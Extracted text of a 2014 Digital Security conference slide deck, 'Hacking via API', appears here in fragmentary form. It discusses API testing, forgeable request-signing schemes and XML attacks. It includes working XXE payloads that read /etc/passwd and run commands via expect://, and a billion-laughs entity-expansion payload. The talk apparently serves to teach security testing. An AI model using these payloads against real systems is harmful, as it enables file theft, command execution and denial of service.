© 2002—2014, Digital Security
2
•
Senior Security Auditor at Digital Security
•
BugHunter: Google, Yandex, Badoo, Yahoo +++
•
Writer: habrahabr, Xakep magazine
•
CTF: DEFCON 2012 CTF Final, Chaos Construction
CTF’2013
•
Speaker: CodeFest 2012, ZeroNights 0x03
What are we talking about?
© 2002—2014, Digital Security
4
Hacking via API
© 2002—2014, Digital Security
12
What should we test?
•
Logic!
•
Bypassing restrictions (sqli/xss)
•
Parameter tampering
Developing
© 2002—2014, Digital Security
14
Hacking via API
© 2002—2014, Digital Security
16
42 Kb…
Hacking via API
42 Kb…
…10 Gb?
© 2002—2014, Digital Security
18
42 Kb…
…10 Gb?
…100 Gb?
Hacking via API
42 Kb…
…10 Gb?
…100 Gb?
© 2002—2014, Digital Security
20
Say
HELLO
to
Hacking via API
The evil of JavaScript
and
© 2002—2014, Digital Security
24
Hacking via API
© 2002—2014, Digital Security
26
Query signing
Sign = sha*(…+DATA+…)
© 2002—2014, Digital Security
28
Hacking via API
Say hello again.
© 2002—2014, Digital Security
30
A=1&B=2&C=3
07ce36c769ae130708258fb5dfa3d37ca5a67514
Hacking via API
© 2002—2014, Digital Security
32
What does the attacker know?
•
Original data
•
Sign (token)
Hacking via API
What does the attacker want?
© 2002—2014, Digital Security
34
Hacking via API
Can sign new query without API key!
Vkontakte: sig = md5(name1=value1name2=value2api_secret)
Mail.RU sig = md5(uid + params + private_key)
© 2002—2014, Digital Security
36
Request hijacking…
Hacking via API
© 2002—2014, Digital Security
46
DTD Example:
<!ENTITY writer "Donald Duck.">
<!ENTITY copyright "Copyright W3Schools.">
XML example:
Hacking via API
XML entities?
© 2002—2014, Digital Security
48
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
"
file:///etc/passwd
" >]>
Hacking via API
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM
“
expect://id
" >]>
© 2002—2014, Digital Security
50
Hacking via API
<?xml
version="1.0"
?>
<!DOCTYPE lolz [ <!ENTITY lol "lol"> <!ELEMENT lolz
(#PCDATA)
>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;"
>
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;"
>
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;"
>
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;"
>
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;"
>
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;"
>
© 2002—2014, Digital Security
52
Hacking via API
© 2002—2014, Digital Security
54
© 2002—2014, Digital Security